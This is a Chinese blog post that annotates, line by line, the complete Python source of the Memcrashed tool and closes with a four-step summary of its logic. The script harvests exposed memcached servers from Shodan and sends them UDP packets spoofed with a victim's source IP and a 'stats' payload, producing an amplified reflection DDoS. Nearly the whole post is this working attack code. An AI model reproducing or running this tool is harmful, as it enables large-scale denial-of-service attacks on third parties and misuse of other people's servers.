0x00前言:

距离世界上最大的Drdos攻击已经过去了两个星期左右

昨天在交流的时候。群友在Github中找到了exploit。

0x01开始:

#-- coding: utf8 --
#!/usr/bin/env python3
import sys, os, time, shodan #导入sys,shodan,os,time模块
from pathlib import Path #从pathlib模块中导入Path
from scapy.all import * #导入scapy
from contextlib import contextmanager, redirect_stdout #从contextlib模块中导入 contextmanager, redirect_stdout

starttime = time.time() #设置时间点

@contextmanager
def suppress_stdout():
    with open(os.devnull, "w") as devnull: #不同设备下的null路径
        with redirect_stdout(devnull):
            yield 

class color:
    HEADER = '\033[0m' #背景颜色字符串

keys = Path("./api.txt") #搜索API.txt
logo = color.HEADER + ''' #好看的标题
   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗ 
   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗
   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║
   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║
   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝
   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
                                        Author: @037
                                        Version: 3.2
####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |
| memcached servers. It then allows you to use the same servers to launch widespread      |
| distributed denial of service attacks by forging UDP packets sourced to your victim.    |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################
                                                                                      
'''
print(logo) #输出好看的标题 = =

if keys.is_file(): #如果路径下有这个文件的话
    with open('api.txt', 'r') as file: #读取API.txt
        SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符
else: #如果没有这个文件
    file = open('api.txt', 'w') #新建API.txt
    SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') #等待用户输入
    file.write(SHODAN_API_KEY) #写入用户输入的东西
    print('[~] File written: ./api.txt') #这个就不说了 = =
    file.close() #关闭文件

while True:
    api = shodan.Shodan(SHODAN_API_KEY) #你的shodan Key
    print('') #= =
    try:
        myresults = Path("./bots.txt") #搜索bots.txt
        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower() #等待用户输入,将输入转化为小写
        if query.startswith('y'): #如果用户输入的是y
            print('')
            print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
            results = api.search('product:"Memcached" port:11211') #从shodan中搜索Memcached服务,并且端口是11211的
            print('[✓] API Key Authentication: SUCCESS') 
            print('[~] Number of bots: %s' % results['total'])
            print('')
            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower() #等待用户输入,将输入转化为小写
            if saveresult.startswith('y'): #如果是y
                file2 = open('bots.txt', 'a') #打开bots.txt
                for result in results['matches']: #变量shodan搜索到的结果
                    file2.write(result['ip_str'] + "\n") #将搜索到的IP写入bots.txt
                print('[~] File written: ./bots.txt')
                print('')
                file2.close() #关闭文件
        saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower() #等待用户输入将输入的转为小写
        if myresults.is_file(): #如果路径下有bots.txt
            if saveme.startswith('y'): #用户输入为y
                with open('bots.txt') as my_file: #读取bots.txt
                    ip_array = [line.rstrip() for line in my_file] #读取IP
        else: #如果路径下没有这个txt
            print('')
            print('[✘] Error: No bots stored locally, bots.txt file not found!')
            print('')
        if saveme.startswith('y') or query.startswith('y'): #两个任意一个为y的话
            print('')
            target = input("[▸] Enter target IP address: ") #等待用户输入
            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
            data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" 
            print('')
            if query.startswith('y'): #如果输入为y的话
                iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower() #等待输入
                if iplist.startswith('y'): #输入为y的话
                    print('')
                    counter= int(0)
                    for result in results['matches']: #遍历shodan搜索的结果
                        host = api.host('%s' % result['ip_str']) #输入IP
                        counter=counter+1
                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
                        time.sleep(1.1 - ((time.time() - starttime) % 1.1))
            if saveme.startswith('y'): #为y的话
                iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower() #等待输入
                if iplistlocal.startswith('y'): #输入为y的话
                    print('')
                    counter= int(0)
                    for x in ip_array:
                        host = api.host('%s' % x) 
                        counter=counter+1
                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
                        time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟,并减去开始的时间
            print('')
            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower() #等待用户输入
            if engage.startswith('y'): #如果为y
                if saveme.startswith('y'): #如果为y
                    for i in ip_array: #遍历ip_array
                        if power>1: #如果power大于1
                            print('[+] Sending %d forged UDP packets to: %s' % (power, i))
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
                        elif power==1:#如果power等于1
                            print('[+] Sending 1 forged UDP packet to: %s' % i)
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP向Memcrashed发送数据
                else: #如果两个都不是
                    for result in results['matches']: 
                        if power>1: #如果power大于1
                            print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据
                        elif power==1: #如果power等于1
                            print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据
                print('')
                print('[•] Task complete! Exiting Platform. Have a wonderful day.')
                break
            else:
                print('')
                print('[✘] Error: %s not engaged!' % target)
                print('[~] Restarting Platform! Please wait.')
                print('')
        else:
            print('')
            print('[✘] Error: No bots stored locally or remotely on Shodan!')
            print('[~] Restarting Platform! Please wait.')
            print('')

    except shodan.APIError as e:
            print('[✘] Error: %s' % e)
            option = input('[*] Would you like to change API Key? <Y/n>: ').lower() #等待输入
            if option.startswith('y'): #如果为y
                file = open('api.txt', 'w') #新建api.txt
                SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') #输入您的shodan可以
                file.write(SHODAN_API_KEY) #加入到文件
                print('[~] File written: ./api.txt')
                file.close() #关闭文件
                print('[~] Restarting Platform! Please wait.')
                print('')
            else: #如果不是
                print('')
                print('[•] Exiting Platform. Have a wonderful day.')
                break

 向Memcrashed发送的数据: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

 Memcrashed exploit地址:https://github.com/649/Memcrashed-DDoS-Exploit

0x02分析完代码获取到的思路:

1.从shodan中获取开放了11211的Memcrashed的服务的IP

2.遍历shodana获取到的IP写入到文件

3.遍历写人IP的文件

4.伪造源IP向遍历的IP发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

版权声明:本文为haq5201314原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/haq5201314/p/8594595.html